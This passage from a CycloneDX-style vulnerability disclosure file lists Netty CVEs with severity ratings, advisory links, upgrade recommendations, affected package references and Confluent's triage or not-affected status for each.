          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#a8cc7e46-c000-47de-8b9d-25b62a9ebb4f"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#ffe97569-e93a-4c50-addd-3a47ee58846c"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#f1bf5597-5ddf-4652-97f8-64780bd991c0"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/io.netty/netty-codec-redis@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:maven/io.netty/netty-codec-redis@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#e09a9826-24ca-4800-870e-f5c568e1966f"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-56819",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400,
        401
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. In versions 4.2.0.Final through 4.2.15.Final and 4.1.0.Final through 4.1.135.Final, a remote unauthenticated peer can leak one direct `ByteBuf` per HTTP/2 `DATA` frame in applications that enable HTTP/2 content decompression via `DelegatingDecompressorFrameListener`. When a `DATA` frame is processed for a stream whose decompressor has already been closed, `Http2Decompressor.decompress(...)` calls `decompressor.writeInbound(data.retain())` and does not release the retained buffer on the error path, eventually exhausting direct memory and crashing the JVM. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http2 to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56819"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56819"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003bhttps://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-93wv-jw9v-4972"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56819"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56819"
        }
      ],
      "published": "2026-07-21T23:17:52+00:00",
      "updated": "2026-07-30T14:46:35+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#d6ee3ce2-4f0b-4a79-816e-3c2ba974a6e7"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#d145c7e6-102f-4b06-92e8-ce40c2279dad"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#f424fd8b-adc2-4ff6-b306-57017bcfa0bb"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#f8b753be-1372-4d23-99f7-0f2a225876b4"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#db6a03e4-95b5-4f8a-a475-1e6d08d8d589"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#8bd091e5-5c32-4fbc-a33e-f0a529ff9a60"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#ec96c986-7272-439c-899a-e196daa54ee0"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#f58728ef-db0d-43cc-a819-79e1c5883be5"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#fe21e3cb-4246-4574-992d-d03aceb5018b"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#fff2eb02-281e-44f6-8f07-f49c9140866e"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#f7aecd34-d071-460d-9bcf-1de8c1851c0f"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#dab000ea-7079-4d8b-83c7-3897f00cd0b8"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#8caa2517-f9f2-4f7f-bf59-08e119e92862"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#f834f5cb-2cc3-4371-bd9c-6f3e295de2fa"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#aba3ff85-5f84-4c0a-83b2-ab23529d47a4"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-56820",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        295
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. In versions 4.2.0.Final through 4.2.15.Final and prior to 4.1.135.Final, `OcspClient` does not validate that the `CertificateID` in an OCSP response matches the requested `CertificateID`, which can lead to replay attack. `OcspClient.validateResponse` accepts a legitimately signed `GOOD` status response for an unrelated certificate issued by the same CA, allowing bypass of revocation checks for another certificate. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-handler-ssl-ocsp to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56820"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56820"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-272m-gcwp-mpwg"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56820"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56820"
        }
      ],
      "published": "2026-07-21T23:17:52+00:00",
      "updated": "2026-07-30T14:48:49+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#d91a53dd-41bf-4278-a655-bb769d2a9eed"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#c7359c00-b573-47cb-9b64-5c8a0172683a"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#7a1cd7a0-3dfd-4370-ab48-56b9543ce5db"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#ffb8524c-2052-47e1-a823-404f3007a7cd"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#d2fe46c7-4e98-49bb-967d-593bf79f5d40"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#fa5e8047-0cff-4fe7-9f47-073b121ae9ad"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#f60d875c-0f37-421c-a2a9-3503858e3062"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#e6f80e42-13e9-4995-960f-4d0642b3b4f5"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#c6893587-936a-48b5-b0cb-f0cc707b1081"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#fb5fb378-b4d5-4f48-9029-f9cf369c0dcd"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#a53bdf1d-483d-4c5e-93ec-430b0c7c3ad9"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. The only CP repo carrying this package, ce-kafka, never instantiates the affected OCSP client class."
      }
    },
    {
      "id": "CVE-2026-56821",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        299
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, the OcspServerCertificateValidator flags an out-of-date OCSP response but does not stop processing it, so an expired GOOD response is still reported as VALID, letting an on-path attacker replay a stale GOOD response to bypass revocation of a since-revoked certificate. Exploitation can lead to certificate revocation bypass via replay of an expired OCSP response. Any application using OcspServerCertificateValidator is affected; a revoked certificate can be accepted. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-handler-ssl-ocsp to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56821"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56821"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-g7hg-vrcf-mvmr"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56821"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56821"
        }
      ],
      "published": "2026-07-29T00:16:38+00:00",
      "updated": "2026-08-07T15:05:53+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#d91a53dd-41bf-4278-a655-bb769d2a9eed"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#c7359c00-b573-47cb-9b64-5c8a0172683a"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#7a1cd7a0-3dfd-4370-ab48-56b9543ce5db"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#ffb8524c-2052-47e1-a823-404f3007a7cd"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#d2fe46c7-4e98-49bb-967d-593bf79f5d40"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#fa5e8047-0cff-4fe7-9f47-073b121ae9ad"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#f60d875c-0f37-421c-a2a9-3503858e3062"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#e6f80e42-13e9-4995-960f-4d0642b3b4f5"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#c6893587-936a-48b5-b0cb-f0cc707b1081"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#fb5fb378-b4d5-4f48-9029-f9cf369c0dcd"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#a53bdf1d-483d-4c5e-93ec-430b0c7c3ad9"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. The only CP repo carrying this package, ce-kafka, never instantiates the affected OCSP validator class."
      }
    },
    {
      "id": "CVE-2026-56822",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        367
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, the OcspServerCertificateValidator forwards the SslHandshakeCompletionEvent before the asynchronous OCSP validation completes. This allows the client's downstream handlers to send sensitive application data (e.g., HTTP requests) to a revoked server before the channel is closed by the OCSP check. n io.netty.handler.ssl.ocsp.OcspServerCertificateValidator#userEventTriggered, when an SslHandshakeCompletionEvent is received, the validator immediately calls ctx.fireUserEventTriggered(evt). It then initiates an asynchronous OCSP query using OcspClient.query. Because the handshake completion event is forwarded immediately, downstream handlers in the client's pipeline are notified that the TLS handshake is successful. They may then begin reading and processing incoming application data or sending outgoing data. If the OCSP response later indicates the server's certificate is REVOKED, the validator closes the channel, but by this time, the client may have already leaked sensitive data to a revoked server or processed malicious responses from it. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-handler-ssl-ocsp to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56822"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56822"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-wc96-39fc-566f"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56822"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56822"
        }
      ],
      "published": "2026-07-29T00:16:38+00:00",
      "updated": "2026-08-07T15:05:31+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#d91a53dd-41bf-4278-a655-bb769d2a9eed"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#c7359c00-b573-47cb-9b64-5c8a0172683a"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#7a1cd7a0-3dfd-4370-ab48-56b9543ce5db"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#ffb8524c-2052-47e1-a823-404f3007a7cd"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#d2fe46c7-4e98-49bb-967d-593bf79f5d40"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#fa5e8047-0cff-4fe7-9f47-073b121ae9ad"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#f60d875c-0f37-421c-a2a9-3503858e3062"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#e6f80e42-13e9-4995-960f-4d0642b3b4f5"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#c6893587-936a-48b5-b0cb-f0cc707b1081"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#fb5fb378-b4d5-4f48-9029-f9cf369c0dcd"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#a53bdf1d-483d-4c5e-93ec-430b0c7c3ad9"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. The only CP repo carrying this package, ce-kafka, never instantiates the affected OCSP validator class."
      }
    },
    {
      "id": "CVE-2026-59898",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        }
      ],
      "cwes": [
        444
      ],
      "description": "Netty is an asynchronous, event-driven network application framework.  Prior to versions 4.1.136.Final and 4.2.16.Final, ab attacker can force WebSocket upgrade via the lax V07 (or V08) handshaker by sending `Sec-WebSocket-Version: 7` and omitting `Connection: Upgrade` / `Upgrade: websocket` headers, completing a protocol switch that a proxy would not recognize as an Upgrade request and enabling HTTP request smuggling / protocol-confusion attacks. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59898"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59898"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-4mp9-239f-g9hg"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59898"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59898"
        }
      ],
      "published": "2026-07-29T19:16:48+00:00",
      "updated": "2026-08-06T20:35:23+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#59482894-99d8-4e97-9ad6-82555a5a8f66"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#e9270d8f-ac37-46a9-ba4d-bccbb3434099"
        },
        {
          "ref": "urn:cdx:7d56b569-5272-47f2-a33d-d86bd677f6c9/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#efded87b-2e1f-45f1-b20f-daf47fabfdd6"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#d664916f-0188-4c6d-976a-a95e5b004984"
        },
        {
          "ref": "urn:cdx:e7f0e99d-6e24-448f-8ce9-0d3e2dfc36a2/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#b5155b1d-7e63-430d-9004-8520ee029169"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#c755cc34-3f6d-447c-b113-46440a5e6657"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#b516514f-e0f6-44e9-b5f5-2db4c89a2fa9"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#ecd9c6d7-21be-4329-8bd2-64415b7c67e8"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f50d8d8f-9f83-4d24-a8be-069154322809"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#fba45fa2-71ff-40da-bbb8-a08bd44cf523"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#bab7766f-9268-4e06-a706-63ef52378b94"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#ffd958be-72a4-4c81-b800-2b6b152841a3"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#f46bd9c5-bbb4-4905-a7e5-87b2cdfa4b07"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#df1f0e67-c2af-4b0a-bc27-0a1d04477689"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#fb09ca96-2de8-4848-83ef-0df6c1b392fe"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#e987c11d-07b4-49db-ab1c-0a2f02c125fe"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#72448050-828a-4fa4-af95-d1e062179c95"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#d612726f-976c-49db-8573-9ddb341ea8ba"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#8ce216c4-3956-4ece-9ac2-5db5191ada51"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#e89047a4-0a3b-4cfb-88c0-ceca6523232d"
        }
